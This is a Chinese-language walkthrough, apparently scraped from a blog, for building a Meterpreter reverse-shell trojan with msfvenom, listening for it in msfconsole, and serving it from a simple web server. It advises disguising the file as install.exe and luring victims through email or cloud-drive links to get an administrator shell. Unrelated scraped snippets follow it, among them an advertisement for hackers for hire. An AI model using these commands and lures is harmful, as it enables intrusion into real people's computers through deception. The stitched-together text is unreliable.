使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。
攻击机(kali):192.168.29.130
被攻击机(window server 2008 SP2):192.168.29.135
1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)
3.实施攻击操作
4.kali攻击机将木马文件拷贝到指定目录
5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 80
6.查看被攻击者的IP地址详情
7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地
9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限
原文链接
头发是吸收我们头皮的营养生长出来的,所以头发的健康状况完全可以体现我们身体的健康程度哦。今天小编就为各位冬季爱掉发的女士们带来了一些食材及食谱,都是对头发有好处,吃了可以让头发更乌黑亮丽哦。 每次梳...
在福利汇总的第13季,我们曾经提到过下面的妹子图 详见:【福利汇总】福利回馈,相助大清点[第13季] 然后就有网友向我求助了,说这是谁啊?求出处? 然而那时是无意找到的图片啊,我也不知道出...
【打了上针没下针?国家卫健委回应】国家卫健委新闻发言人米锋21日在国务院联防联控机制新闻发布会上表示,近期,有群众反映第二剂次预约难的情况。当前,国家为各省份调配供应疫苗时,已充分考虑如期接种第二剂次...
编辑导读:产物的版本进级看似简朴,可是其实很巨大,有很多环境需要留意,譬喻任务数量、执行周期、时间节点等。本文作者从实际事情出发,分享了辅佐产物平稳进级的几点发起,但愿对你有所辅佐。 曾有一段时间,...
如何在手机上成为一个黑客(黑客手机号码定位)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...
德联本钱现场同享面向数据库安全范畴的出资逻辑Android Pie中引进了BiometricPrompt API来协助APP运用生物数据,包含面部、指纹和虹膜。 为了保证用户的安全,Android Q...